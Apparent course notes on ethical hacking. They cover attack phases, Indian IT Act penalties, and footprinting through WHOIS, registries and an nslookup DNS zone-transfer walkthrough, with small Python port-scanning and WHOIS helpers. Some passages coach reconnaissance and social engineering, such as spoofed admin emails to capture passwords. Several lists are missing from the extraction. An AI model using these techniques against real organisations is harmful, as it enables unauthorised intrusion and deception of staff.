Ethical Hacking PDF
ETHICAL HACKING
Unit I
Objective:
The objective of this unit is to familiarize the learner with the different phases of
ethical hacking and to explain the various legal implications of hacking. The unit
also provides details on the law and punishments applicable to hacking.
Introduction:
This unit guides the learner through the various terminologies used in hacking and
enables the learner to comprehend the different phases involved in hacking. It also
provides an overview of attacks, the legal implications of hacking, and the
punishments for hacking.
The word 'hacker' denotes a person who enjoys learning the details of computer
systems and stretching their capabilities.
The verb 'hacking' denotes the rapid development of new programs or the
reverse engineering of existing software to make the code better and more
efficient.
The term 'cracker' denotes a person who uses his hacking skills for offensive
purposes.
The term 'ethical hacker' denotes security professionals who apply their hacking
skills for defensive purposes.
Enterprises have started to realize the need to evaluate their systems for vulnerabilities
and to address security gaps. The role of an independent security professional,
examined in this context from an auditor's perspective, brings out the need for ethical
hackers. A systems audit does include a security evaluation to check for security
lapses, though in a methodical manner with less scope for innovation or 'thinking
out of the box'.
Security used to be a private matter. Until recently, information security was addressed
by a handful of trained professionals. With the advent of e-business and the highly
networked business scenario, security has become everyone's responsibility. The
paradigm shift of technologically enabled crime has made security everyone's
business. Ethical hackers are professionals who are able to visualize this and respond
to actual and potential threats. This not only protects them from attacks but in the
process does a lot of common good. The consequences of a security breach are so
large that this proactive, volunteer activity should not only be encouraged but also
rewarded. This does not imply that a self-proclaimed ethical hacker is better off
doing his victims a 'favor'.
At present the tactical objective is to stay one step ahead of the crackers. The need of
the hour is to think more strategically for the future. Social behavior, as it relates to
computers and information technology, goes beyond merely adhering to the law since
the law often lags behind technological advance.
The ethical question here concerns the activity itself. The activity of ethical hacking is
sometimes hard to differentiate from cracking, since it is hard to discern intent and
predict future action. The main difference is that while an ethical hacker identifies
vulnerabilities (often using the same scanning tools as a cracker), the ethical hacker
does not exploit them, whereas a cracker does. Until a social framework is developed
to discern the good from the bad, ethical hacking should not be condemned.
Otherwise, in our haste to condemn it, we might fail to harness the goodness in
talented people, thereby risking the elimination of our last thin line of stabilizing defense.
2. Essential terminology
Before exploring the various nuances of ethical hacking, it is worth understanding the
common terminology of the hacking world.
2.1. Hacker
The term 'hacker' refers to a person who learns the details of computer systems and
stretches their capabilities.
2.2. Cracker
The term 'cracker' refers to a person who uses his hacking skills for offensive purposes.
2.7. Hacktivism
'Hacktivism' refers to a kind of electronic civil disobedience in which activists take direct
action by breaking into, or protesting through, government or corporate computer systems.
It can be considered a kind of information warfare, and it is on the rise. Hacktivists
consider it their obligation to bring an offline issue close to their agenda into the online
world. The apparent increase in hacktivism may be due in part to the growing
importance of the Internet as a means of communication. As more people go online,
websites become high-profile targets.
2.8. Vulnerability
A vulnerability can be defined as the existence of a weakness, or a design or
implementation error, that can lead to an unexpected, undesirable event compromising
the security of the system.
2.9. Exploit
A defined way to breach the security of an IT system through a vulnerability.
[Figure: the five phases of hacking]
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
3.1. Phase 1 – Reconnaissance
Reconnaissance is the preparatory phase where a hacker will collect as much
information as possible about a target. This phase is also where the attacker draws on
competitive intelligence to learn more about the target. This phase may also involve
network scanning, either external or internal, without authorization.
This may spread over time, as the attacker waits to unearth crucial information. One
aspect that gains prominence here is social engineering. A social engineer is a person
who smooth-talks people into disclosing sensitive information such as unlisted
phone numbers and passwords. Reconnaissance techniques also include dumpster
diving. Dumpster diving is the process of looking through an organization's trash for
deleted or discarded sensitive information.
Attackers can use the Internet to obtain information such as employee contact
information, business partners, technologies in use and other critical business
knowledge. For example, the WHOIS database can give information about Internet
addresses, ___domain names, contacts, etc. If a potential attacker obtains the DNS
information from the registrar and is able to access it, he can obtain useful information
such as the mapping of ___domain names to IP addresses, mail servers, host information
records, etc.
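The WHOIS records described above arrive as plain "Key: Value" text. As a minimal sketch, the helper below collects such pairs from a raw response; the sample record and its field names are illustrative only, since real WHOIS servers vary widely in their output format.

```python
# Sample WHOIS-style response (hypothetical; real servers differ in layout).
SAMPLE_WHOIS = """\
Domain Name: EXAMPLE.COM
Registrar: Example Registrar, Inc.
Name Server: NS1.EXAMPLE.COM
Name Server: NS2.EXAMPLE.COM
"""

def parse_whois(text):
    """Collect 'Key: Value' pairs; repeated keys accumulate into lists."""
    record = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        record.setdefault(key.strip(), []).append(value.strip())
    return record

record = parse_whois(SAMPLE_WHOIS)
print(record["Registrar"][0])   # Example Registrar, Inc.
print(record["Name Server"])    # both name servers
```

Such a parser is only a convenience; an attacker (or defender auditing exposure) would feed it the output of a live WHOIS query.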
Organizations should have appropriate policies to protect the usage of their information
assets and should also provide guidelines to users on what constitutes acceptable use.
These policies will definitely increase user awareness and accountability.
An attacker can get critical network information such as mapping of systems, routers
and firewalls by using simple tools such as traceroute. Alternatively, they can use tools
such as Cheops to add sweeping functionality along with that rendered by traceroute.
Traceroute is a network-based utility that shows the path over the network between
two systems and lists all the intermediate routers on the way to the final destination.
On Windows the equivalent command is tracert:

tracert 127.0.0.1
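A small sketch of working with traceroute output: the snippet below pulls the hop number and router address out of traceroute-style text. The sample output is fabricated for illustration, and the pattern targets a simplified layout; real Windows tracert and Unix traceroute output differ in detail.

```python
import re

# Fabricated traceroute-style output for demonstration purposes.
SAMPLE_TRACE = """\
 1  192.168.1.1  1.2 ms
 2  10.0.0.1  5.4 ms
 3  203.0.113.7  18.9 ms
"""

# Match a leading hop number followed by a dotted-quad IPv4 address.
HOP_RE = re.compile(r"^\s*(\d+)\s+(\d{1,3}(?:\.\d{1,3}){3})")

def parse_hops(text):
    """Return a list of (hop_number, router_ip) tuples."""
    hops = []
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if m:
            hops.append((int(m.group(1)), m.group(2)))
    return hops

for hop, addr in parse_hops(SAMPLE_TRACE):
    print(hop, addr)
```

An attacker maps the routers in such a hop list to infer where firewalls and network boundaries sit, which is exactly why tools like Cheops build on traceroute.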
3.2. Phase 2 – Scanning
Port scanners can detect listening ports to find information about the different types of
services running on the target machine. The primary defense technique is to remove all
services that are not required. Filtering can also be adopted as a defense mechanism;
however, attackers can still use tools to determine the rules implemented by this
filtering.
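The simplest form of port scanning is a TCP connect() scan, sketched below; it only reports ports that complete the TCP handshake, whereas real scanners such as Nmap also use stealthier probe types. The demonstration runs against a throwaway listener on localhost so that no external host is touched.

```python
import socket

def scan_ports(host, ports, timeout=0.5):
    """TCP connect() scan: return the subset of ports that accept a connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:   # 0 means the connect succeeded
                open_ports.append(port)
    return open_ports

# Demonstration against a local throwaway listener.
listener = socket.socket()
listener.bind(("127.0.0.1", 0))          # OS picks a free port
listener.listen(1)
port = listener.getsockname()[1]

print(scan_ports("127.0.0.1", [port]))   # the listener's port is reported open
listener.close()
```

The defense noted above applies directly: a service that is not running cannot show up in the scan result.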
Vulnerability scanners are scanning tools that can detect several known
vulnerabilities on a target network. This gives the attacker the advantage of time,
because he has to find just a single means of entry while the systems professional has
to secure several vulnerabilities by applying patches.
3.3. Phase 3 - Gaining Access
This is the most important phase of an attack. For instance, denial-of-service attacks
can either exhaust resources or stop services from running on the target system.
Stopping a service can be done by killing processes, using a logic/time bomb or even
reconfiguring and crashing the system. Resources can be exhausted locally by filling up
outgoing communication links, etc.
The exploit can occur over a LAN, locally, over the Internet, offline, or as deception or
theft, e.g. stack-based buffer overflows, denial of service, session hijacking, etc. Another
common technique is spoofing, in which attackers exploit the system by pretending to
be someone else or a different system. They can use this technique to send a malformed
packet containing a bug to the target system and exploit a vulnerability. Packet flooding
may be used to remotely stop the availability of essential services.
Factors that influence whether a hacker can gain access to a target system include the
architecture and configuration of the target system, the attacker's skill set and the initial
level of access obtained. The most damaging denial-of-service attack is a distributed
denial-of-service attack, where an attacker uses zombie software distributed over
several machines on the Internet to trigger an orchestrated, large-scale denial of
service.
The risk involved when an attacker gains access is perceived to be high, as the attacker
can gain access at the operating system level, application level or even the network
level, thereby accessing several systems over the network.
Hackers can use Trojan horses to transfer user names, passwords, even credit card
information stored on the system. They can maintain control over 'their' system for long
time periods by 'hardening' the system against other hackers and sometimes in the
process do render some degree of protection to the system from other attacks. They
can then use their access to steal data, consume CPU cycles, trade sensitive
information or even resort to extortion.
Organizations can use intrusion detection systems or even deploy honeynets to detect
intruders. The latter, though, is not recommended unless the organization has the
required security professional talent to leverage the concept for protection.
An attacker can use the system as a cover to launch fresh attacks against other
systems or use it as a means to reach another system on the network undetected. Thus
this phase of attack can turn into a new cycle of attack by using reconnaissance
techniques all over again.
There have been instances where the attacker has lurked on systems even as
system administrators have changed. System administrators can deploy host-based
IDS and antivirus tools that can detect Trojans and other seemingly benign files
and directories.
4. Overview of Attacks
Preparation, conduct and conclusion are the three phases of security testing. The
process of conducting a security evaluation begins with a questionnaire covering what
the organization is trying to protect, against whom, and at what cost. After discussing
these aspects with the organization, a security plan is prepared which identifies the
systems to be tested for vulnerabilities, how the testing will be carried out and what
restrictions may apply.
Limited vulnerability analysis is a process of identifying the specific entry points to the
organization's information systems over the Internet, as well as the visibility of mission
critical systems and data from a connection on the internal network. On detection, the
potential entry points and mission critical systems are scanned for known vulnerabilities.
The scanning is done using standard connection techniques and not solely based on
vulnerability scanners.
In an attack and penetration testing, discovery scans are conducted to gain as much
information as possible about the target. This process is also similar to the limited
vulnerability analysis but the penetration scans can be performed from both the Internet
and internal network perspective. This approach differs from a limited vulnerability
analysis in that here, the testing is not limited to scanning alone. It goes a step further
and tries to exploit the vulnerabilities. This is said to simulate a real threat to data
security.
Therefore, the ethical hacker must communicate to his client the urgency for corrective
action that can extend even after the evaluation is completed. If the system
administrator delays the evaluation of his system until a few days or weeks before his
computers need to go online again, no ethical hacker can provide a really complete
evaluation or implement the corrections for potentially immense security problems.
Therefore, such aspects must be considered during the preparation phase.
The last phase is the conclusion phase, where the results of the evaluation are
communicated explicitly in a report and the organization is apprised of the security
threats, vulnerabilities and recommendations for protection.
5. Identification of Exploit Categories
There are several ways to conduct a security evaluation. An ethical hacker may attempt
to perform an attack over various channels such as:
Section 43 deals with penalties and compensation for damage to computers, computer
systems, etc. This section is the first major and significant legislative step in India to
combat hacking and data theft. The IT industry had long been clamoring for legislation
in India to address the crime of data theft, just like physical theft or larceny of goods
and commodities. This section addresses the civil offence of theft of data. If any person,
without the permission of the owner or any other person in charge of a computer,
accesses or downloads, copies or extracts any data, introduces any computer
contaminant such as a virus, damages or disrupts any computer, denies access to a
computer to an authorized user, or tampers with it, he shall be liable to pay damages to
the person so affected. Earlier, in the ITA-2000, the maximum damages under this head
were Rs. 1 crore; this ceiling was removed in the IT Amendment Act 2008.
Now, after the amendment, the data theft of Section 43 is referred to in Section 66, making
that section more purposeful, and the word 'hacking' is not used. The word 'hacking' was
earlier named as a crime in this section, while at the same time courses on 'ethical hacking'
were taught academically. This led to an anomalous situation of people asking how an
illegal activity could be taught academically with the word 'ethical' prefixed to it. This tricky
situation was put an end to by the ITAA when it re-phrased Section 66 by mapping it to the
civil liability of Section 43 and removing the word 'hacking'. However, the act of hacking is
still certainly an offence under this section, though some experts interpret 'hacking' as
generally being for good purposes (obviously to facilitate naming the courses as ethical
hacking) and 'cracking' as being for illegal purposes.
8. Summary
This unit provided the learner with an explanation of the concepts and terminology of
ethical hacking. It helps the learner gain knowledge of the different phases of hacking,
including reconnaissance, a phase where the attacker uses different kinds of tactics to
gain extensive information about targets, and scanning, where the unit discusses the
different scanning methodologies adopted by the hacker. It also covers the access-gaining
methodology adopted by the attacker against targets and the strategy used by the
attacker to maintain access over the target networks, and it concludes with the legal
aspects of ethical hacking and the punishments given to an attacker for illegally
hacking a network.
References:
Command Line Basics for Ethical Hacking:
http://www.youtube.com/watch?v=WBOoZyfsARM
Questionnaires:
1. What is Ethical Hacking?
Objectives
The objective of this unit is to familiarize the learner with the essential terms in hacking
and the various phases of attacks committed by malicious attackers.
Introduction
The second unit of Ethical Hacking introduces the learner to some essential terms
such as threat, vulnerability, attack and exploit, and also the step-by-step attack
methodology used by a malicious hacker in a successful attack against an
organization's network.
1. Essential Terms
Before we can move on to the tools and techniques, we shall look at some of the key
definitions. The essence of this section is to adopt a standard terminology throughout
the courseware.
What does it mean when we say that an exploit has occurred? To understand this we
need to understand what constitutes a threat and vulnerability.
1.1. Threat
A threat is an indication of a potential undesirable event. It refers to a situation in which
human(s) or natural occurrences can cause an undesirable outcome. It has been
variously defined in the current context as:
1.2. Vulnerability
Vulnerability has been variously defined in the current context as:
It is important to note the difference between threat and vulnerability. This is because
inherently, most systems have vulnerabilities of some sort. However, this does not
mean that the systems are too flawed for usability.
The key difference between threat and vulnerability is that not every threat results in an
attack, and not every attack succeeds. Success depends on the degree of vulnerability,
the strength of attacks, and the effectiveness of any counter measures in use. If the
attacks needed to exploit vulnerability are very difficult to carry out, then the vulnerability
may be tolerable.
Logically, the next essential term is 'attack'. What is being attacked here? The
information resource that is being protected and defended against attacks is usually
referred to as the target of evaluation. It has been defined as an IT system, product, or
component that is identified as requiring security evaluation.
1.3. Attack
An attack has been defined as an assault on system security that derives from an
intelligent threat, i.e., an intelligent act that is an attempt to evade security services and
violate the security policy of a system.
Note that an attack is defined as an 'intelligent act', that is, a deliberate attempt. Attacks
can be broadly classified as active and passive.
Active attacks are those that modify the target system or message, i.e. attacks
that violate the integrity of the system or message are examples of an active
attack. An example in this category is an attack on the availability of a system or
service, a so-called denial-of-service (DoS) attack. Active attacks can affect the
availability, integrity and authenticity of the system.
Passive attacks are those that violate confidentiality without affecting the
state of the system. An example is electronic eavesdropping on network
transmissions to release message contents or to gather unprotected passwords.
The key word here is 'confidentiality', which relates to preventing the disclosure
of information to unauthorized persons.
The difference between these categories is that while an 'active attack' attempts to alter
system resources or affect their operation, a 'passive attack' attempts to learn or make
use of information from the system but does not affect system resources.
The figure below shows the relation of these terms and sets the scope for this module.
[Figure: an attacker poses threats that exploit vulnerabilities in the target of evaluation]
Attacks can also be categorized as originating from within the organization or external to
it.
How does an attack agent (or attacker) take advantage of the vulnerability of the
system? The act of taking advantage of a system vulnerability is termed an 'exploit'.
2. Elements of Security
Note that it is not implied that total protection is required, as this is not practically
possible considering the evolution of technology and the dynamic environment of the
system. There are several aspects to security in the current context. The owner of a
system should have the confidence that the system will behave according to its
specification. This is termed as assurance. Systems, users, applications need to interact
with each other in a networked environment. Identification or authentication is a means
to ensure security in such a scenario. System administrators or other authority needs to
know who has accessed the system resources when and where for what purpose. An
audit trial or log files can address this aspect of security termed as accountability. Not all
resources are usually available to all users. This can have strategic implications. Having
access controls on predefined parameters can help achieve these security
requirements.
Another security aspect critical at the systems operational level concerns reusability:
objects used by one process may not be reused or manipulated by another process
such that security may be violated; this is known in security parlance as the object
reuse problem. Information and processes also need to be accurate in order to derive
value from the system resource; accuracy is a key security element. The two aspects
discussed above constitute the integrity of the system.
2.1. Reconnaissance
Before the real fun for the hacker begins, three essential steps must be performed.
Reconnaissance, the fine art of gathering information, is about scoping out your
target of interest, understanding everything there is to know about that target and how it
interrelates with everything around it, often without sending a single packet to your
target. And because the direct target of your efforts may be tightly shut down, you will
want to understand your target's related or peripheral entities as well.
Let's look at how physical theft is carried out. When thieves decide to rob a bank, they
don't just walk in and start demanding money. Instead, they take great pains to gather
information about the bank: the armored car routes and delivery times, the security
cameras and alarm triggers, the number of tellers and escape exits, the money vault
access paths and authorized personnel, and anything else that will help in a successful
attack.
The same requirement applies to successful cyber attackers. They must harvest a
wealth of information to execute a focused and surgical attack (one that won't be readily
caught). As a result, attackers will gather as much information as possible about all
aspects of an organization's security posture. In the end, if done properly, hackers end
up with a unique profile, called a 'footprint', of their target's Internet, remote access,
intranet/extranet and business partner presence. By following a structured methodology,
attackers can systematically extract information from a multitude of sources to compile
this critical footprint of nearly any organization.
Footprinting of an organization's technology identifies items such as:
Domain names
Intrusion-detection systems
Authentication mechanisms
Domain names
Be sure to investigate other sites beyond the main 'http://www' and 'https://www'
sites as well. Hostnames such as www1, www2, web, web1, test, test1, etc., are all
great places to start in your footprinting adventure. But there are others, many others.
Many organizations have sites to handle remote access to internal resources via a web
browser. Microsoft's Outlook Web Access is a very common example. It acts as a proxy
to the internal Microsoft Exchange servers from the Internet. Typical URLs for this
resource are https://owa.example.com or https://outlook.example.com. Similarly,
organizations that make use of mainframes, System/36s or AS/400s may offer remote
access via a web browser through services like Web Connect by Open Connect, which
serves up a Java-based 3270 and 5250 emulator and allows 'green screen'
access to mainframes and midrange systems such as AS/400s via the client's browser.
Virtual private networks (VPNs) are very common in most organizations as well, so
looking for sites like http://vpn.example.com, https://vpn.example.com, or
http://www.example.com/vpn will often reveal websites designed to help end users
connect to their companies' VPNs. You may find VPN vendor and version details as
well as detailed instructions on how to download and configure the VPN client software.
These sites may even include a phone number to call for assistance if the hacker, that
is, employee has any trouble getting connected.
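The hostname hunt described above can be sketched as a simple candidate generator. The prefix list reuses the examples from the text (www1, owa, vpn, and so on); a real engagement would verify each candidate via DNS, which is deliberately omitted here so nothing is queried.

```python
# Common hostname prefixes drawn from the examples above; any real target
# may use entirely different names, so treat this list as a starting point.
COMMON_PREFIXES = ["www", "www1", "www2", "web", "web1",
                   "test", "test1", "owa", "outlook", "vpn"]

def candidate_hosts(___domain, prefixes=COMMON_PREFIXES):
    """Build candidate hostnames to check against DNS for a given ___domain."""
    return [f"{prefix}.{___domain}" for prefix in prefixes]

for host in candidate_hosts("example.com")[:3]:
    print(host)
```

Each candidate would then be resolved (and, if it resolves, probed further), turning a guess list into a confirmed map of exposed hosts.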
Even if an organization keeps a close eye on what it posts about itself, its partners are
usually not as security-minded. They often reveal additional details that, when combined
with your other findings, could result in a more sensitive aggregate than your sites
revealed on their own. Additionally, this partner information could be used later in a
direct or indirect attack such as a social engineering attack. Taking the time to check out
all the leads will often pay nice dividends in the end.
Using Google Maps (http://maps.google.com), you can utilize the Street View feature,
which provides a 'drive-by' series of images so you can familiarize yourself
with the building, its surroundings, the streets, and the traffic of the area. All this helpful
information for the average Internet user is a treasure trove of information for the bad
guys.
2.3.3.4. Employees: Phone Numbers, Contact Names, E-mail Addresses, and Personal Details
Attackers can use phone numbers to look up your physical address via sites like
www.yellowpages.com.
They may also use your phone number to help them target their war-dialing ranges, or
to launch social-engineering attacks to gain additional information and/or access.
Contact names and e-mail addresses are particularly useful data. Most organizations
use some derivative of the employee's name for their username and e-mail address (for
example, John Smith's username is jsmith, johnsmith, john.smith, john_smith, or smithj,
and his e-mail address is [email protected] or something similar). If we know one of
these items, we can probably figure out the others. Having a username is very useful
later in the methodology when we try to gain access to system resources. All of these
items can be useful in social engineering as well (more on social engineering later).
Other personal details can be readily found on the Internet using any number of sites,
which can give hackers personal details ranging from home phone numbers and
addresses to social security numbers, credit histories, and criminal records, among
other things.
In addition to these personal tidbits, there are websites that can be pilfered for
information on your current or past employees in order to learn more about you and
your company's weaknesses and flaws. The websites you should frequent in your
footprinting searches include social networking sites (Facebook.com, Myspace.com,
Reunion.com, Classmates.com), professional networking sites (Linkedin.com), career
management sites (Monster.com, naukri.com), family ancestry sites (Ancestry.com),
and even online photo management sites (Flickr.com, Photobucket.com); all of these
can be used against you and your company.
Attackers might use any of this information to assist them in their quests. An attacker
might also be interested in an employee's home computer, which probably has some
sort of remote access to the target organization. A keystroke logger on an employee's
home machine or laptop may very well give a hacker a free ride to the organization's
inner sanctum. Why bang one's head against the firewalls, IDS, IPS, etc., when the
hacker can simply impersonate a trusted user?
The human factor comes into play during these events, too. Morale is often low during
times like these, and when morale is low, people may be more interested in updating
their resumes than watching the security logs or applying the latest patch. At best, they
are somewhat distracted. There is usually a great deal of confusion and change during
these times, and most people don't want to be perceived as uncooperative or as
inhibiting progress. This provides for increased opportunities for exploitation by a skilled
social engineer.
2.3.3.6. Privacy or Security Policies and Technical Details Indicating the Types of Security
Mechanisms in Place
Any piece of information that provides insight into the target organization's privacy or
security policies or technical details regarding hardware and software used to protect
the organization can be useful to an attacker for obvious reasons. Opportunities will
most likely present themselves when this information is acquired.
The core functions of the Internet are managed by a nonprofit organization, the Internet
Corporation for Assigned Names and Numbers (ICANN; http://www.icann.org).
ICANN is a technical coordination body for the Internet. Created in October 1998 by a
broad coalition of the Internet's business, technical, academic, and user communities,
ICANN is assuming responsibility for a set of technical functions previously performed
under U.S. government contract by the Internet Assigned Numbers Authority (IANA;
http://www.iana.org) and other groups. (In practice, IANA still handles much of the
day-to-day operations, but these will eventually be transitioned to ICANN.)
Specifically, ICANN coordinates the assignment of the following identifiers that must be
globally unique for the Internet to function:
In addition, ICANN coordinates the stable operation of the Internet's root DNS server
system.
While there are many parts to ICANN, three of the sub-organizations are of particular
interest to us at this point:
The ASO reviews and develops recommendations on IP address policy and advises the
ICANN board on these matters. The ASO allocates IP address blocks to various
Regional Internet Registries (RIRs) who manage, distribute, and register public Internet
number resources within their respective regions. These RIRs then allocate IPs to
organizations, Internet service providers (ISPs), or in some cases, National Internet
Registries (NIRs) or Local Internet Registries (LIRs) if particular governments require it
(mostly in communist countries, dictatorships, etc.):
The GNSO reviews and develops recommendations on ___domain-name policy for all
generic top-level domains (gTLDs) and advises the ICANN Board on these matters. It's
important to note that the GNSO is not responsible for ___domain-name registration, but
rather is responsible for the generic top-level domains (for example, .com, .net, .edu, .org,
and .info), which can be found at http://www.iana.org/gtld/gtld.htm.
The CCNSO reviews and develops recommendations on ___domain-name policy for all
country-code top-level domains (ccTLDs) and advises the ICANN Board on these
matters. Again, ICANN does not handle ___domain-name registrations. The definitive list of
country-code top-level domains can be found at http://www.iana.org/cctld/cctldwhois.htm.
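Since ccTLDs are by definition two-letter country codes (ISO 3166-1 alpha-2), a simple heuristic can separate them from gTLDs, as sketched below; the authoritative lists remain the IANA pages cited above.

```python
def tld_kind(___domain):
    """Classify a ___domain's TLD: two alphabetic characters implies a ccTLD,
    anything else is treated as a generic TLD (gTLD)."""
    tld = ___domain.rstrip(".").rsplit(".", 1)[-1].lower()
    return "ccTLD" if len(tld) == 2 and tld.isalpha() else "gTLD"

print(tld_kind("example.com"))   # gTLD
print(tld_kind("example.in"))    # ccTLD
```

Knowing which kind of TLD a target uses tells the investigator whether GNSO-governed gTLD registrars or the relevant country-code registry holds the registration data.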
With all of this centralized management in place, mining for information should be as
simple as querying a central super-server farm somewhere. While the management is
fairly centralized, the actual data is spread across the globe in numerous WHOIS
servers for technical and political reasons. To further complicate matters, the WHOIS
query syntax, type of permitted queries, available data, and formatting of the results can
vary widely from server to server. Furthermore, many of the registrars are actively
restricting queries to combat spammers, hackers, and resource overload; to top it all off,
information for .mil and .gov domains has been pulled from public view entirely due to
national security concerns.
The first order of business is to determine which one of the many WHOIS servers
contains the information we're after. The general process flows like this: the
authoritative Registry for a given TLD, '.com' in this case, contains information about
which Registrar the target entity registered its ___domain with. Then you query the
appropriate Registrar to find the Registrant details for the particular ___domain name you're
after. We refer to these as the 'Three Rs' of WHOIS: Registry, Registrar, and
Registrant.
There are many places on the Internet that offer one-stop shopping for WHOIS
information, but it's important to understand how to find the information yourself for
those times when the auto-magic tools don't work. Since WHOIS information is based
on a hierarchy, the best place to start is the top of the tree: ICANN. ICANN (IANA) is
the authoritative registry for all of the TLDs and is a great starting point for all manual
WHOIS queries.
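The 'Three Rs' chain above can be sketched in code: ask the registry which registrar holds the ___domain, then ask that registrar for the registrant record. A real query sends the ___domain name over TCP port 43 of the WHOIS host; here the transport is injectable so the referral-following flow can be demonstrated offline with canned responses (the server names below mirror the text's keyhole.com example, and the registrant line is invented for illustration).

```python
import socket

def whois_query(server, query, port=43, timeout=10):
    """Real transport: send one query to a WHOIS server, read until close."""
    with socket.create_connection((server, port), timeout=timeout) as s:
        s.sendall((query + "\r\n").encode())
        chunks = []
        while data := s.recv(4096):
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")

def find_registrant(___domain, registry_server, query=whois_query):
    """Registry -> Registrar -> Registrant, following the referral line."""
    registry_answer = query(registry_server, ___domain)
    for line in registry_answer.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "registrar whois server":
            return query(value.strip(), ___domain)
    return registry_answer   # no referral: the registry answer is final

# Offline demonstration with canned responses standing in for live servers.
def fake(server, ___domain):
    if server == "whois.verisign-grs.com":
        return "Registrar WHOIS Server: whois.markmonitor.com"
    return "Registrant Organization: Example Corp"

print(find_registrant("keyhole.com", "whois.verisign-grs.com", query=fake))
```

With the default transport in place of `fake`, the same function walks the live Registry/Registrar chain, subject to whatever query restrictions each server imposes.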
If we surf to http://whois.iana.org, we can search for the authoritative registry for all of
.com. This search shows us that the authoritative registry for .com is Verisign Global
Registry Services at http://www.verisign-grs.com. If we go to that site and click the
Whois link to the right, we get the Verisign Whois Search page where we can search for
keyhole.com and find that keyhole.com is registered through
http://www.markmonitor.com. If we go to that site and search their "Search Whois"
field on the right, we can query this registrar‘s WHOIS server via their web interface to
find the registrant details for keyhole.com.
This registrant detail provides physical addresses, phone numbers, names, e-mail
addresses, DNS server names, IPs, and so on. If you follow this process carefully, you
shouldn‘t have too much trouble finding registrant details for any (public) ___domain name
on the planet. Remember, some domains like .gov and .mil may not be accessible to
the public via WHOIS.
Last but not least, there are several GUIs available that will also assist you in your
searches:
SamSpade http://www.samspade.org
SuperScan http://www.foundstone.com
NetScan Tools Pro http://www.nwpsw.com
Once you‘ve homed in on the correct WHOIS server for your target, you may be able to
perform other searches if the registrar allows it. You may be able to find all the domains
that a particular DNS server hosts, for instance, or any ___domain name that contains a
certain string. These types of searches are rapidly being disallowed by most WHOIS
servers, but it is still worth a look to see what the registrar permits. It may be just what
you‘re after.
Let‘s say that while perusing your security logs, you run across an interesting entry with
a source IP of 61.0.0.2. You start by entering this IP into the WHOIS search at
http://www.arin.net, which tells you that this range of IPs is actually managed by APNIC.
You then go to APNIC‘s site at http://www.apnic.net to continue your search. Here you
find out that this IP address is actually managed by the National Internet Backbone of
India.
This process can be followed to trace back any IP address in the world to its owner, or
at least to a point of contact that may be willing to provide the remaining details. As with
anything else, cooperation is almost completely voluntary and will vary as you deal with
different companies and different governments. Always keep in mind that there are
many ways for a hacker to masquerade their true IP. In today‘s cyberworld, it‘s more
likely to be an illegitimate IP address than a real one. So the IP that shows up in your
logs may be what we refer to as a laundered IP address and almost untraceable.
We can also find out the IP ranges and BGP autonomous system (AS) numbers that an
organization owns by searching the RIR WHOIS servers for the organization's literal
name. For example, if we search for "Google" at http://www.arin.net, we see the IP
ranges registered under Google's name as well as its AS number, AS15169. The IP
ranges are obvious targets; the AS number is valuable because, once known, it can be
used to look up every network prefix the organization announces via BGP, often
revealing address space that a simple name search would miss.
The administrative contact is an important piece of information because it may tell you
the name of the person responsible for the Internet connection or firewall. Our query
also returns voice and fax numbers. This information is an enormous help when you‘re
performing a dial-in penetration review. Just fire up the war-dialers in the noted range,
and you‘re off to a good start in identifying potential modem numbers. In addition, an
intruder will often pose as the administrative contact using social engineering on
unsuspecting users in an organization. An attacker will send spoofed e-mail messages
posing as the administrative contact to a gullible user. It is amazing how many users will
change their passwords to whatever you like, as long as it looks like the request is being
sent from a trusted technical support person.
The last piece of information provides us with the authoritative DNS servers, which are
the sources of records for name lookups for that ___domain or IP. The first one listed is the
primary DNS server; subsequent DNS servers will be secondary, tertiary, and so on.
We will need this information for our DNS interrogation, discussed later in this chapter.
Additionally, we can try to use the network range listed as a starting point for our
network query of the ARIN database.
One of the most serious misconfigurations a system administrator can make is allowing
untrusted Internet users to perform a DNS zone transfer. Although this technique has
become almost obsolete, we include it here because misconfigured servers still turn up
and because it illustrates just how much information DNS can leak.
A zone transfer allows a secondary master server to update its zone database from the
primary master. This provides for redundancy when running DNS, should the primary
name server become unavailable. Generally, a DNS zone transfer needs to be
performed only by secondary master DNS servers. Many DNS servers, however, are
misconfigured and provide a copy of the zone to anyone who asks. This isn‘t
necessarily bad if the only information provided is related to systems that are connected
to the Internet and have valid hostnames, although it makes it that much easier for
attackers to find potential targets. The real problem occurs when an organization does
not use a public/private DNS mechanism to segregate its external DNS information
(which is public) from its internal, private DNS information. In this case, internal
hostnames and IP addresses are disclosed to the attacker. Providing internal IP
address information to an untrusted user over the Internet is akin to providing a
complete blueprint, or roadmap, of an organization‘s internal network. Let‘s take a look
at several methods we can use to perform zone transfers and the types of information
that can be gleaned. Although many different tools are available to perform zone
transfers, we are going to limit the discussion to several common types.
A simple way to perform a zone transfer is to use the nslookup client that is usually
provided with most UNIX and Windows implementations. We can use nslookup in
interactive mode, as follows:
[bash]$ nslookup
Default Server: ns1.example.com
Address: 10.10.20.2
> server 192.168.1.1
Default Server: gate.example.com
Address: 192.168.1.1
> set type=any
> ls -d example.com. >> /tmp/zone_out
We first run nslookup in interactive mode. Once started, it will tell us the default name
server that it is using, which is normally the organization‘s DNS server or a DNS server
provided by an ISP. However, our DNS server (10.10.20.2) is not authoritative for our
target ___domain, so it will not have all the DNS records we are looking for. Therefore, we
need to manually tell nslookup which DNS server to query. In our example, we want to
use the primary DNS server for example.com (192.168.1.1).
Next we set the record type to "any." This will allow us to pull any available DNS
records (see man nslookup for a complete list).
Finally, we use the ls option to list all the associated records for the ___domain. The –d
switch is used to list all records for the ___domain. We append a period (.) to the end to
signify the fully qualified ___domain name—however, you can leave this off most times. In
addition, we redirect our output to the file /tmp/zone_out so that we can manipulate the
output later.
After completing the zone transfer, we can view the file to see whether there is any
interesting information that will allow us to target specific systems. Let‘s review
simulated output for example.com:
acct18 ID IN A 192.168.230.3
ID IN HINFO "Gateway2000" "WinWKGRPS"
ID IN MX 0 exampleadmin-smtp
ID IN RP bsmith.rci bsmith.who
ID IN TXT "Location:Telephone Room"
ce ID IN CNAME aesop
au ID IN A 192.168.230.4
